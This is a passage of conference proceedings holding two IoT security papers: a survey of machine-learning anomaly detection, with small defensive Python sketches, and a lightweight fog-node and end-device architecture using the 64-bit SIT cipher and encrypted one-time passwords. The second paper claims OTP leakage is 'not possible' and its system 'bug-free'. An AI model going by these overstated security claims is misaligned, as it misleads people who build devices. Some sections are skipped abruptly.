15. Borah, S. J., Dhurandher, S. K., Woungang, I., Kandhoul, N., & Rodrigues, J. J. C. (2018). An
energy-efficient location prediction-based forwarding scheme for opportunistic networks. In
IEEE ICC, 1–6.
16. Kandhoul, N., & Dhurandher, S. K. (2019). An asymmetric RSA based security approach for
opportunistic IoT. In WIDECOM (pp. 47–60). Milan, Italy: Springer.
17. Keränen, A., Ott, J., & Kärkkäinen, T. (2009). The one simulator for DTN protocol evaluation.
In Proc. of the 2nd International Conference on Simulation Tools and Techniques (pp. 1–10).
Institute for Computer Sciences, Social-Informatics and Telecommunications Engineering.
18. Crawdad haggle dataset. https://crawdad.org/uoi/haggle/20160828/one. Accessed: 2019-10-
18.
A Survey on Anomaly Detection
Techniques in IoT
Abstract When small everyday ‘things’ or objects are augmented with computing
capabilities and a connection is created between them, they form a network of Internet
of things (IoT) devices. Since IoT devices have reached home users as well, it
has become crucial to maintain the integrity of these devices and prevent any malicious
mishap arising from security flaws. Many researchers have proposed
techniques for this purpose, from understanding propagation behavior and
influential factors to developing frameworks like software-defined anything (SDx) in
order to detect and mitigate security attacks on IoT devices. In this paper, a survey
of such techniques, published in the decade 2010 to
2020, is presented, with a focus on recent publications and a comparison study of all the mentioned
sources. The aim of this survey is to motivate researchers in the area of IoT and
its security and to understand what the current trend is and what the future holds for
development in the area.
1 Introduction
The era of the Internet of Things (IoT) has come forth: every little item in the household is
being converted to a digital alternative, every item is being equipped with a processor,
and these items are getting connected to each other, performing in sync and providing
ease to humankind. The Internet offers global communication worldwide; hence,
all of these devices can be accessed from anywhere in the world. The technology
behind IoT has been growing at a swift pace for the past decade, but recently, with
the advancement in technology and faster communication with efficient bandwidth
control, the pool of IoT devices has seen a burst in growth [1]. An estimated
twenty-two billion IoT devices are currently connected to the Internet, a number that is only
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 139
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_11
140 P. Sharma and S. K. Sharma
going to increase as time passes and is expected to pass the fifty billion mark by 2030
[2].
IoT devices can be broadly defined under three categories:
a. Big Things
Big Things are not big in size, but in the complexity of their design and
of how they work. For instance, a telecom company manages its big IoT
devices, like base stations and mobile station controllers; all of these devices
are connected to power outlets. They are connected to the Internet as well, without
the need for bandwidth control, and there are thousands of parameters to be
controlled in this scenario.
b. Small Things
Small IoT devices are the simpler things, in terms of complexity, that are
used every day by the average user and are connected to the Internet. This
category contains mostly sensors and small devices that can run on battery
power and are supposed to have efficient bandwidth control, as most of the time
these devices use a subscriber identity module, or SIM card [3]. For instance,
a smart bulb or tube light at home: these kinds of devices follow a set-and-get
rule and do not have thousands of parameters to work on.
c. Non-IP Things
These are things that are called IoT, but are not really IoT, because they are
not connected to the Internet. They use protocols like ZigBee, Z-Wave, and BLE,
which do not use the Internet, but the things become
IoT devices with the help of a gateway. The gateway adds a layer of complexity, but it is
still much less than for the Big Things; the data model is just as simple as for the
Small Things.
As internet applications grow day by day, their security against intrusion
has become a significant issue [4]. IoT devices have not been glorious in terms
of security and face certain challenges: as they are heterogeneous devices, it becomes
complex to form one secure mechanism that can be implemented by all of the devices;
instead, each individual device requires a unique security mechanism. The second
challenge comes from the very advantage of IoT devices itself, i.e., their
interconnectivity; since all of the devices are connected with each other, if one of
them gets compromised, it is relatively easy to intrude into the other devices as well.
As the world moves forward with the implementation of smart cities and
interconnected devices, correct maintenance practices are required [5]. Security
mechanisms have become a crucial part of the research on such devices. A secure
IoT infrastructure should therefore be created that provides protection from
cybercrime and covers the vulnerabilities of the devices: in a smart city, data is
of utmost value, even more than money. The IoT security infrastructure
should thus be built in such a way that even if it gets compromised, it has the ability to
recover. For such purposes, several techniques have been exploited, and in
this paper, a survey of these techniques is presented. The key aspect of
A Survey on Anomaly Detection Techniques in IoT 141
this paper is the realization that anomaly detection has provided more protection than other machine learning-based techniques in terms of IoT security.
The anomaly-based technique follows an item's behavior: the observations made on the behavior of an item/object are recorded and learned. If, for any reason, a change is observed in that behavior, it is marked as an anomaly or deviation, which is not supposed to occur in the system and is hence treated as an alarming situation. For this reason it is also known as the profile-based detection technique. Anomaly-based detection detects these unknown patterns and reports them [6].
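The profile-based idea can be sketched in a few lines of Python (a minimal illustration of the principle, not any of the surveyed systems): a baseline profile is learned from observations of normal behavior, and readings that deviate too far from it are flagged.

```python
import numpy as np

class ProfileDetector:
    """Profile-based anomaly detector: learn a baseline of normal
    behaviour, then flag observations that deviate from it."""

    def __init__(self, threshold=3.0):
        self.threshold = threshold  # tolerated deviation, in std units

    def fit(self, normal_obs):
        # Build the profile (per-feature mean/std) from normal behaviour.
        self.mean = np.mean(normal_obs, axis=0)
        self.std = np.std(normal_obs, axis=0) + 1e-9
        return self

    def is_anomaly(self, obs):
        # Flag the reading if any feature deviates too far from the profile.
        z = np.abs((np.asarray(obs) - self.mean) / self.std)
        return bool(np.any(z > self.threshold))

# Example: requests/minute and payload size observed from one device
normal = np.array([[10, 200], [12, 210], [11, 190], [9, 205]])
det = ProfileDetector().fit(normal)
print(det.is_anomaly([11, 200]))    # in-profile behaviour -> False
print(det.is_anomaly([500, 9000]))  # deviating behaviour -> True (alarm)
```

Real systems profile far richer behavior (traffic patterns, timing, system calls), but the record-learn-compare loop is the same.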
As Fig. 1 shows, requests from the devices are analyzed at the server level, and when a service request is detected as an outlier/abnormal request, the request is declined and an alarm is sent to the administrator. The flow chart of the working of anomaly detection is shown in Fig. 2.
This paper is arranged as follows: related work is described in Sect. 2; Section 3 formulates a comparison in which the various machine learning algorithms are analyzed; finally, the conclusions are presented in Sect. 4.
2 Literature Review
In this section, some of the research work done in the IoT security area is reviewed. The aim of this survey is to motivate researchers in the area of IoT and its security, and to clarify what the current trend is and what the future holds for development in the area.
In the research done by Hasan et al. [8], various machine learning techniques, namely logistic regression (LR), support vector machine (SVM), decision tree (DT), random forest (RF), and artificial neural network (ANN), were used, and their accuracy was analyzed in the context of a secure infrastructure for IoT devices. Each of the techniques reached more than 98% accuracy.
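The comparison protocol behind such studies can be sketched with scikit-learn on synthetic data (a hedged illustration only: the dataset, features, and settings here are ours, not those of Hasan et al.):

```python
# Sketch: train the same five classifier families on a synthetic
# "normal vs. attack" dataset and report held-out accuracy for each.
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier

# Synthetic stand-in for labeled IoT traffic (0 = normal, 1 = attack)
X, y = make_classification(n_samples=2000, n_features=10, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

models = {
    "LR": LogisticRegression(max_iter=1000),
    "SVM": SVC(),
    "DT": DecisionTreeClassifier(random_state=0),
    "RF": RandomForestClassifier(random_state=0),
    "ANN": MLPClassifier(max_iter=1000, random_state=0),
}
for name, model in models.items():
    acc = model.fit(X_tr, y_tr).score(X_te, y_te)
    print(f"{name}: accuracy {acc:.3f}")
```

On real IoT traces, accuracy depends heavily on feature engineering and class balance, which is why the surveyed papers report such different numbers.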
Liu et al. [9] proposed detection based on 'ON' and 'OFF' states, noting that a malicious attack can be performed on an IoT device while it is in its sleep mode. They also observed that, after being attacked, compromised devices do not change their work and perform the same tasks in an ordinary manner, so detecting them is challenging.
Diro et al. [10] proposed a fog-to-things architecture based on deep and shallow neural networks, with experiments on an open-source database. Their experiment detected anomalies across four test classes, achieving 98.27% accuracy with the deep neural network model and 96.75% with the shallow one.
Hodo et al. [11] performed a threat analysis using an artificial neural network (ANN); the main focus of their analysis was to classify normal and threat patterns in an IoT network. They performed their experiment in a simulated IoT environment, achieved an accuracy of 99.4%, and verified that ANN-based IoT analysis can successfully detect DDoS/DoS attacks.
Pacheco et al. [12] proposed a threat-analysis framework made up of four layers: device, network, service, and application. Their experiment claims to identify potential attacks, provide a method of mitigation for the compromised system, and perform full recovery. Their classification model reached an accuracy of 98% for known attacks and 97.4% for unknown attacks.
Golomb et al. [13] proposed a new framework, CIoTA (Collaborative IoT Anomaly detection via blockchain). The framework builds on the concept of blockchain, which allows it to perform distributed anomaly detection. Their experiment was performed in a simulated environment; the overhead of their system reached only up to 6.5%, and it was able to withstand all of the exploitation experiments performed on it.
Alrashdi et al. [14] worked on the security issues of smart-city IoT devices and proposed an anomaly-based random forest classifier to detect compromised IoT devices at distributed fog nodes. Their experiment achieved an accuracy of 99.34%.
Garg et al. [15] analyzed a clustering technique used with IoT devices to detect anomalies, density-based spatial clustering of applications with noise (DBSCAN). They discovered, however, that DBSCAN suffers from two issues: parameter selection and finding the correct nearest neighbors. They provided a multi-stage model using the Boruta algorithm to capture the most relevant feature set and the firefly algorithm to correctly find the centroids. Their experiment yielded an accuracy of 96.23%.
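The parameter-selection issue that Garg et al. identify is easy to demonstrate (a sketch on synthetic data; their Boruta and firefly remedies are not reproduced here): the set of points DBSCAN labels as noise, i.e., as anomalies, swings widely with the `eps` neighborhood radius.

```python
# Illustration of DBSCAN's parameter-selection problem: the same data
# yields very different anomaly ("noise") counts as eps changes.
import numpy as np
from sklearn.cluster import DBSCAN

rng = np.random.default_rng(0)
normal = rng.normal(0, 0.3, size=(200, 2))    # dense cluster of normal traffic
outliers = rng.uniform(-4, 4, size=(10, 2))   # scattered anomalous points
X = np.vstack([normal, outliers])

for eps in (0.1, 0.3, 1.0):
    labels = DBSCAN(eps=eps, min_samples=5).fit_predict(X)
    print(f"eps={eps}: {np.sum(labels == -1)} points flagged as noise")
```

A too-small `eps` marks much of the normal cluster as anomalous; a too-large one absorbs true outliers, which is precisely why automated parameter and neighbor selection matters.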
Luo and Nagarajan [16] introduced autoencoder neural networks into wireless sensor networks (WSNs) to address the elusive nature of anomalies and the volatility of ambient environments. Their approach reduced the overhead and computational load by moving this task from the IoT device to the cloud. They achieved higher accuracy with lower false-positive rates than existing counterparts, and their system also claims to adapt to new changes in the network.
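The reconstruction-error principle behind such autoencoder detectors can be sketched as follows (using scikit-learn's `MLPRegressor` as a stand-in autoencoder on synthetic sensor data; this is not the authors' model): a network trained to reproduce normal readings reconstructs anomalous readings poorly, and that error gap is the detection signal.

```python
# Stand-in for the auto-encoder idea: learn to reconstruct normal
# sensor readings, then flag inputs whose reconstruction error exceeds
# a threshold calibrated on normal data.
import numpy as np
from sklearn.neural_network import MLPRegressor

rng = np.random.default_rng(1)
normal = rng.normal(25.0, 1.0, size=(500, 4))  # e.g. 4 temperature sensors

ae = MLPRegressor(hidden_layer_sizes=(2,), max_iter=2000, random_state=1)
ae.fit(normal, normal)  # learn the identity map through a 2-unit bottleneck

def recon_error(x):
    x = np.atleast_2d(np.asarray(x, dtype=float))
    return float(np.mean((ae.predict(x) - x) ** 2))

# Threshold: 99th percentile of reconstruction error on normal data
threshold = np.percentile([recon_error(row) for row in normal], 99)

print(recon_error([25.1, 24.8, 25.3, 24.9]) > threshold)  # typical reading
print(recon_error([90.0, 10.0, 85.0, 5.0]) > threshold)   # faulty/attacked
</```

Running the detector in the cloud rather than on the sensor, as in [16], keeps this training and scoring cost off the constrained device.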
Nguyen et al. [17] presented a new framework for IoT security, named DÏoT, an autonomous self-learning distributed system that can detect compromised IoT devices in a network. The framework does not require human intervention and is able to successfully detect anomalies caused by malicious adversaries.
144 P. Sharma and S. K. Sharma
It employs a federated learning approach and is able to adapt to new and unknown attacks. Their experiment yielded a high accuracy rate of 95.6% with no false alarms in a real-world setting.
Data can be collected from various sources and mined as well, but knowledge discovery alone does not yield enough results to support a controlling action. This is where anomaly detection comes into the picture: IoT sensors capture rich information, and this additional information provides enough data to classify an action as anomalous or normal [18, 19]. In this section, the reviewed literature is compared in Table 1, and an empirical analysis is provided afterward.
It has been found that most research on improving security through anomaly detection in IoT devices is based on machine learning algorithms and their various classifiers, and the most influential application is 'smart cities.' The selected research papers span the years 2014–2020. The technical insights reviewed in Sect. 2 are intended to give the reader an entry point into this field of research. The above comparison provides the reader with the details of the techniques actively being improved for anomaly detection in IoT devices, so that a learned decision can be made about where energy should be invested to overcome the existing challenges. Considering the potential applications of IoT devices in the future, it is crucial not only to build such highly secure frameworks for upcoming IoT devices, but also to make advancements so that the current generation of IoT devices can be upgraded without requiring the user to remove the devices from the network for a considerable amount of time.
4 Conclusion
As IoT devices have seen a burst of growth in both creation and usage, it has become crucial to maintain the integrity of these devices and prevent any unethical mishap arising from security flaws. According to some researchers, securing the IoT devices' access points and addressing their weaknesses would solve the problem, but IoT devices need to be secured as whole units and should be able to recover from a compromised situation. For that purpose, this paper presented a survey of such techniques, with a comparative study of all the mentioned sources. The aim of this survey is to motivate researchers in the area of IoT and its security and to clarify what the current trend is and what the future holds for development in the area. As analyzed, security enhancements are being made with the help of machine learning techniques to improve anomaly detection for IoT devices, since the sensors present in IoT devices capture rich information, useful enough to make a correct classification of normal or anomalous behavior. A future application in this area could be to adjust the security infrastructure so that, even if an attacker learns the sensor information and gains enough access to launch a replay attack, the IoT device is able to mitigate and recover successfully. This situation might be addressed with the help of a moving target defense (MTD) strategy, making it very difficult to perform analysis on the IoT device's database.
References
1. Lueth, K. L. (2014). Why the internet of things is called internet of things: Definition, history,
disambiguation. IoT Analytics, 19.
2. shorturl.at/stPX2. Accessed 26 Dec 2020.
3. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement, 150, 107077.
4. Singh Bhati, N., Khari, M., Garcia-Diaz, V., & Verdu, E. (2020). A review on intrusion detection
systems and techniques. International Journal of Uncertainty, Fuzziness and Knowledge-Based
Systems.
5. Bhati, B. S., & Rai, C. S. (2020). Ensemble based approach for intrusion detection using extra
tree classifier. Intelligent computing in engineering (pp. 213–220). Singapore: Springer.
6. Bhati, B. S., Chugh, G., Al-Turjman, F., & Bhati, N. S. (2020). An improved ensemble based
intrusion detection technique using XGBoost. Transactions on Emerging Telecommunications
Technologies, e4076.
7. Gurina, A., & Eliseev, V. (2019). Anomaly-based method for detecting multiple classes of
network attacks. Information, 10(3), 84.
8. Hasan, M., Islam, M. M., Zarif, M. I. I., & Hashem, M. M. A. (2019). Attack and anomaly
detection in IoT sensors in IoT sites using machine learning approaches. Internet of Things, 7,
100059.
9. Liu, X., Liu, Y., Liu, A., & Yang, L. T. (2018). Defending ON–OFF attacks using light
probing messages in smart sensors for industrial communication systems. IEEE Transactions
on Industrial Informatics, 14(9), 3801–3811.
10. Diro, A. A., & Chilamkurti, N. (2018). Distributed attack detection scheme using deep learning
approach for internet of things. Future Generation Computer Systems, 82, 761–768.
11. Hodo, E., Bellekens, X., Hamilton, A., Dubouilh, P. L., Iorkyase, E., Tachtatzis, C., & Atkinson,
R. (2016). Threat analysis of IoT networks using artificial neural network intrusion detec-
tion system. In 2016 International Symposium on Networks, Computers and Communications
(ISNCC) (pp. 1–6). IEEE.
12. Pacheco, J., & Hariri, S. (2018). Anomaly behavior analysis for IoT sensors. Transactions on
Emerging Telecommunications Technologies, 29(4), e3188.
13. Golomb, T., Mirsky, Y., & Elovici, Y. (2018). CIoTA: collaborative IoT anomaly detection via
blockchain. arXiv preprint arXiv:1803.03807.
14. Alrashdi, I., Alqazzaz, A., Aloufi, E., Alharthi, R., Zohdy, M., & Ming, H. (2019). Ad-iot:
Anomaly detection of iot cyber attacks in smart city using machine learning. In 2019 IEEE 9th
Annual Computing and Communication Workshop and Conference (CCWC) (pp. 0305–0310).
IEEE.
15. Garg, S., Kaur, K., Batra, S., Kaddoum, G., Kumar, N., & Boukerche, A. (2020). A multi-stage
anomaly detection scheme for augmenting the security in IoT-enabled applications. Future
Generation Computer Systems, 104, 105–118.
16. Luo, T., & Nagarajan, S. G. (2018). Distributed anomaly detection using autoencoder neural
networks in wsn for iot. In 2018 IEEE International Conference on Communications (ICC)
(pp. 1–6). IEEE.
17. Nguyen, T. D., Marchal, S., Miettinen, M., Fereidooni, H., Asokan, N., & Sadeghi, A. R.
(2019). DÏoT: A federated self-learning anomaly detection system for IoT. In 2019 IEEE 39th
International Conference on Distributed Computing Systems (ICDCS) (pp. 756–767). IEEE.
18. Ukil, A., Bandyoapdhyay, S., Puri, C., & Pal, A. (2016). IoT healthcare analytics: The
importance of anomaly detection. In 2016 IEEE 30th international conference on advanced
information networking and applications (AINA) (pp. 994–997). IEEE.
19. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
Novel IoT End Device Architecture
for Enhanced CIA: A Lightweight
Security Approach
Abstract Security is a burning issue in wearable IoT end devices. The exponential growth of IoT has delegated processing and storage from the cloud to wearable end devices. Due to the resource-constrained nature of IoT end devices, balancing light weight and security is a challenge. In this paper, light weight within IoT end devices is ensured by shifting virtualization onto the fog node and implementing the lightweight secure internet of things (SIT) cryptographic algorithm using the Arduino IDE on an ESP32. A stable chain of trust creates a robust trusted execution environment (TEE) to ensure security within IoT devices. Inter-IoT-device security is ensured by a one-time password (OTP) encrypted using the SIT algorithm. The SIT algorithm is lightweight, since it uses a key size of 64 bits and 22 bytes of run-time memory with a total encryption and decryption execution time of 0.375 ms, and is optimal for our proposed lightweight IoT end device architecture.
1 Introduction
The Internet of Things (IoT) architecture comprises a cloud core, fog nodes, and end devices [1]. Wearable end devices have the least processing and storage and communicate with the cloud core via fog nodes. With the growth of IoT systems, processing and storage have been delegated from the cloud to the edge, which has increased attacks on end devices [11], resulting in over-architectured and vulnerable IoT end devices. A typical Type-1 hypervisor-based IoT end device architecture [15] is shown in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 147
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_12
148 P. Mishra et al.
Fig. 1. Since the hypervisor is at level 1, this type of device is known as a Type-1 hypervisor-based IoT end device. The architecture comprises bare metal at level 0 for processing and storage. A thin software layer, the hypervisor, at level 1 creates virtualization, monitors virtual machine behavior, and provides temporal and spatial isolation at run time. A virtual machine comprises guest OS(s) at level 2 and virtual applications at level 3. Virtualization extension technology (VTx) implements sharing of processors and footprints among the VMs [8]. All the trusted hardware and software within the IoT end device form the trusted computing base (TCB), hence the chain of trust (CoT), followed by the trusted execution environment (TEE), to establish guaranteed security in terms of confidentiality, integrity, and authenticity (CIA).
Bulky TCB components in wearable devices incur excess weight and complexity, followed by more bugs, vulnerabilities, and overheads. The more area exposed [2, 7] to the untrusted external world, the less secure the device, thus a breach of trust and therefore a weak TEE [11]. Protection of the TCB is ensured by minimum size and minimum complexity; hence TCB minimization is mandatory for lightweight and secure IoT end devices [9]. As shown in Fig. 1, the higher layers of an IoT end device architecture are the easiest target for threats, allowing a high attack volume with minimum effort and resources due to direct interaction with the external untrusted world, whereas the lower layers require huge effort and resources [3] and are thus difficult to attack, thanks to an uninterrupted secure boot process.
Therefore, in our proposed architecture, a lightweight micro (µ)-hypervisor [4] has been implemented on the fog node to shift virtual machines from the IoT end devices to the fog nodes, minimizing the TCB components and resulting in secure IoT end devices. The lightweight SIT algorithm is implemented because of its minimal code
Novel IoT End Device Architecture … 149
size, since IoT end devices are characterized by low storage, low run-time memory, and the need for minimal execution time. Lightweight, trusted components have less complexity, hence few or no bugs, and also support minimum latency, so as to ensure security in terms of confidentiality, integrity, and authenticity (CIA). Only trusted devices from the external world may be allowed to interact with trusted IoT edge devices, because the security requirements are inevitable. Due to resource limitations in IoT end devices, we need lightweight TCB components in terms of minimum footprint and minimum latency [9, 10].
The objective of this paper is to propose a novel lightweight architecture along with the implementation of a lightweight cryptographic algorithm so as to enhance CIA. The rest of the paper is organized as follows: Sect. 2 summarizes the literature review. Section 3 discusses the need for a lightweight cryptographic algorithm. Sections 4 and 5 present the novel lightweight architecture and its functionality. Section 6 presents results and discussion. Section 7 concludes the paper.
2 Literature Review
• The security holes of IoT end devices are not properly understood [12].
• The IoT device architecture in [5] claims to be lightweight but is over-architectured compared to our proposed one, due to a hypervisor size of approx. 13 K and hypervisor-based virtualization at the IoT end device. It has no remote updates, no secure terminal access, no provision against internal bugs and vulnerabilities within the TCB, and only partial confidentiality, integrity, and authenticity.
• The IoT device architectures in [6, 7, 13] are over-architectured due to the absence of lightweight considerations and hence unsecure. These architectures have no provisions against side-channel attacks and provide partial confidentiality and integrity but no authenticity.
• The security mechanisms evaluated in [19] lead to the conclusion that key size, number of rounds, and word size increase the execution time of a cryptographic algorithm.
• The smaller the key size of a cryptographic algorithm, the faster the algorithm. The research in [16–19] uses a 128-bit key size, which is sufficient to slow down execution.
• Usman et al. [14] mention that implementing conventional, computationally expensive security algorithms will hinder the performance of wearable devices.
keys. These keys are used to encrypt and decrypt communication between IoT edge
and fog node.
Table 1 shows the comparison between various cryptographic algorithms. Key sizes are in bits; code sizes and RAM are in bytes. The cycle counts cover encryption (enc), decryption (dec), and the key expansions that secure the keys involved in encryption and decryption. As the table shows, SIT uses optimal resources: a 64-bit key, 826 bytes of code, and 22 bytes of RAM. Its encryption and decryption are also faster than those of the other cryptographic algorithms. Thus, SIT is optimal for wearable IoT devices.
The proposed novel architecture comprises three components: (i) fog node, (ii) web interface, and (iii) IoT end device. The components are described in Sects. 4.1, 4.2, and 4.3.
As shown in Fig. 2, the fog node has (i) bare metal at the bottom, with a one-time memory holding the BL with RPK. When the node powers on, the boot process ensures CIA. Authentication from lower to upper layers continues until all software is loaded; thus a chain of trust (CoT) is built and a robust trusted execution environment (see R. TEE in Fig. 2) is established. (ii) The µ-visor (see Fig. 2) lies in the middle, between the bare metal and the virtual machines. The µ-visor is the thinnest software layer, smaller in lines of code and consuming fewer resources than traditional hypervisors, making it the most feasible choice for wearable lightweight IoT end devices. The µ-visor creates virtual machines (VMs) at the top layer and monitors their behavior. It also provides spatial and temporal separation at run time through the virtualization extension (VTx). If a VM misbehaves, the µ-visor blocks that VM and issues an alert for further necessary actions. Additionally, the µ-visor here generates a one-time password (OTP) and encrypts it.
The encrypted OTP is sent to an IoT end device via the transceiver when the end device tries to connect to the fog node. Every VM contains a signature (see Fig. 2) to register new IoT end devices and to connect already registered ones. After registration, every fog node stores the user id and password, along with the device id, of all its end devices. Every IoT end device also stores its own user id and password along with its device id. If an already registered IoT end device wants to connect to the fog node, it sends its user id and password along with its device id to the fog node. The fog node then searches for the corresponding user id, password, and device id in its own database. If the search is successful, the fog node issues a one-time password (OTP) to the respective IoT end device. After OTP verification, the IoT end device is connected to the fog node. Once the connection is established, the VM starts receiving data from that IoT end device. To identify the data source, received data is passed to the data fragmentation and device identification block (see Data Frag. & Device ID in Fig. 2) for (1) identification of the device using the frames coming from the respective IoT end device (see Data Frame in Figs. 3–6) and (2) identification of the device using the device ID (see Device ID in Fig. 3). The data decryption block (see D. DEC. in Fig. 4) then decrypts the data encrypted at the IoT end so as to recover the original data. Finally, the data processing block (see D. Pro. in Fig. 4) ensures delivery of the processed data to the external world.
A watchdog stored in the one-time memory runs continuously and keeps track of any misbehavior; if such malignancy is detected, an alert is issued for further necessary actions, yielding a bug-free system. A bug-free system is more trusted and establishes a stable CoT, resulting in a robust TEE and hence a trusted fog node.
As shown in Fig. 2, the web interface (WI) allows communication between an IoT end device and the fog node. The WI has a device id and password block to register and connect an IoT end device with the fog node, and an OTP block to authenticate the IoT end device before data transmission to the fog node.
As shown in Fig. 3, the bare metal has the same boot features as in the fog node (see Fig. 2); thereafter, the third-party signature of the software layer is examined and authenticated by the boot loader [see Fig. 3(2)], and the software layer is then loaded [see Fig. 3(3)]. Thus a stable chain of trust (CoT) creates a robust TEE, resulting in a trusted IoT end device. The software layer comprises (i) a sensor data block to store sensed data in a data buffer [see Fig. 3(4)]; (ii) a secure internet of things (SIT) encryption block, which encrypts the sensed data using the lightweight SIT algorithm; (iii) a data frame block, which converts the encrypted data into data frames by adding the device id to the header [see Fig. 3(5)]; (iv) a data transmission block, which transmits the data frames to the fog node via the transceiver using the web interface [see Fig. 3(7)]; and (v) an SIT OTP decryption block [see Fig. 3(8)], which decrypts the OTP from the fog node using the SIT decryption algorithm and forwards it for device id verification via the web.
As shown in Fig. 4, at the beginning, when an edge device is ready, the user provides a 64-bit cipher key [see Fig. 4(1)]. This key is stored in write-once memory and generates the unique keys for encryption [see Fig. 4(2)]. Thereafter, the sensor data in the data buffer is encrypted by the SIT encryption algorithm [14] using this unique key [see Fig. 4(3)]. The encrypted data is then converted into data frames [see Fig. 4(4)], where the device id is included in the header of the encrypted data packet. The encrypted data packet is sent to the fog node through the transceiver [see Fig. 4(5)]. The fog node receives the data packets [see Fig. 4(5)] and fragments them to obtain the encrypted data and the device ID of the IoT end device. The fog node then checks whether the device ID is verified [see Fig. 4(6)]. If not [see Fig. 4(7)], the ID is passed to the web interface for verification [see Fig. 4(8)]. The user now provides the 64-bit cipher key for verification of the IoT end device id at the fog node [see Fig. 4(9)]; this verification is performed only the first time the IoT end device connects to the fog node. Once the cipher key is obtained, the fog node's µ-visor generates an OTP [see Fig. 4(10)]. The OTP is encrypted using the SIT algorithm [see Fig. 4(11)] and sent to the transceiver for transmission to the edge device [see Fig. 4(12)]. The IoT edge device receives the encrypted OTP and passes it to the OTP decryption block, where it is decrypted using SIT decryption and its unique keys [see Fig. 4(13)]. The decrypted OTP is then passed to the user [see Fig. 4(14)], who enters it into the web interface for verification [see Fig. 4(15)]. If the received OTP matches the generated OTP, the device ID and the corresponding 64-bit cipher key are stored in secure storage at the fog node for later verification [see Fig. 4(16)]. This completes the setup. The next time the IoT end device sends data, the fog node fetches the cipher key from the secure storage based on the device ID [see Fig. 4(17)], generates the unique key [see Fig. 4(18)], and decrypts the data using the SIT decryption algorithm [see Fig. 4(19)].
The decrypted data is then sent to the data processing block of the fog node for further processing [see Fig. 4(20)]. This concludes how the SIT cryptographic algorithm works on the proposed lightweight architecture, making it secure.
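The registration-and-OTP flow above can be condensed into a sketch (the XOR "cipher" below is a deliberately insecure placeholder standing in for SIT encryption/decryption, and the class and method names are ours, not the paper's):

```python
# Sketch of the fog-node side of the connection flow: look up the
# device's credentials, issue an encrypted OTP, verify it once.
import hmac
import secrets

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Placeholder for SIT encryption/decryption (NOT secure)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

class FogNode:
    def __init__(self):
        self.registry = {}   # device_id -> (user_id, password, cipher_key)
        self._pending = {}   # device_id -> OTP awaiting verification

    def register(self, device_id, user_id, password, cipher_key):
        self.registry[device_id] = (user_id, password, cipher_key)

    def connect_request(self, device_id, user_id, password):
        known = self.registry.get(device_id)
        if known is None or known[:2] != (user_id, password):
            return None                       # unknown credentials: decline
        otp = secrets.token_bytes(4)
        self._pending[device_id] = otp
        return xor_cipher(otp, known[2])      # "SIT-encrypted" OTP to device

    def verify_otp(self, device_id, otp):
        expected = self._pending.pop(device_id, None)  # one use only
        return expected is not None and hmac.compare_digest(expected, otp)

key = bytes(8)  # demo 64-bit key (all zeros; a real key comes from the user)
fog = FogNode()
fog.register(b"ESP32-01", "alice", "pw", key)
enc_otp = fog.connect_request(b"ESP32-01", "alice", "pw")
otp = xor_cipher(enc_otp, key)                # end device decrypts the OTP
print(fog.verify_otp(b"ESP32-01", otp))       # True: connection established
```

Note how popping the pending OTP makes it single-use, which is what gives the scheme its replay resistance once a real cipher replaces the placeholder.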
To ensure light weight, a host OS was avoided both at the fog node and at the IoT edge. The lightweight µ-hypervisor was implemented only at the fog node, not at the IoT edge device; hence virtualization was transferred from the IoT edge to the fog node. This transfer minimized the TCB area, and hence resource utilization and memory, and enhanced performance, thus reducing the attack surface at the IoT end device. A bug-free TCB and authentication between TCBs create a stable chain of trust (CoT), resulting in a robust TEE (R.TEE). The SIT-encrypted OTP sent by the fog node to the IoT end device during login ensures CIA. The SIT algorithm consumes only about 22 bytes of memory, with encryption and decryption execution times of 0.188 and 0.187 ms, respectively. The µ-hypervisor and software consumed about 32.75% of the total 4 MB flash and 6.30% of the 520 KB SRAM, i.e., 32.77 KB, for a total footprint of 39.05%. Based on Table 1, the comparison graph of algorithms in Fig. 5 shows that SIT is best in terms of encryption and decryption cycle time and code size, and hence best for a lightweight, secure fog node and IoT end device.
7 Conclusion
The proposed novel IoT architecture implements a stable chain of trust, and hence a robust trusted execution environment, for intra-IoT-device security. A trusted connection is established between IoT end devices and fog nodes before data transmission. End device verification is performed using an encrypted OTP to guarantee confidentiality (OTP leakage is not possible), integrity (OTP modification is not possible), and authenticity (end device verification by the user of the device). The lightweight SIT cryptographic algorithm was implemented in the proposed novel architecture using the Arduino IDE on an ESP32. The results confirm that the lightweight novel IoT architecture consumes 1.31 MB of flash and 32.77 KB of SRAM. The SIT cryptographic algorithm consumes 22 bytes of memory, with fast encryption and decryption totaling 0.375 ms. Thus the proposed novel architecture guarantees lightweight security in the lightweight novel IoT architecture.
References
1. Zhang, P. Y., Zhou, M. C., & Fortino, G. (2018). Security and trust issues in fog computing:
A survey. Future Generation Computer Systems, 88, 16–27. https://doi.org/10.1016/j.future.
2018.05.008
2. Dall, C., & Nieh, J. (2014). KVM/ARM. ACM SIGPLAN Notices, 333–348. https://doi.org/
10.1145/2644865.2541946.
3. Cheruvu, S., Kumar, A., Smith, N., & Wheeler, D. M. (2019). Demystifying Internet of Things
Security: Successful IoT Device/Edge and Platform Security Deployment (1st ed.). Apress.
https://doi.org/10.1007/978-1-4842-2896-8.
4. Iqbal, A., Sadeque, N., & Mutia, R.I. (2010). An Overview of microkernel, hypervisor and
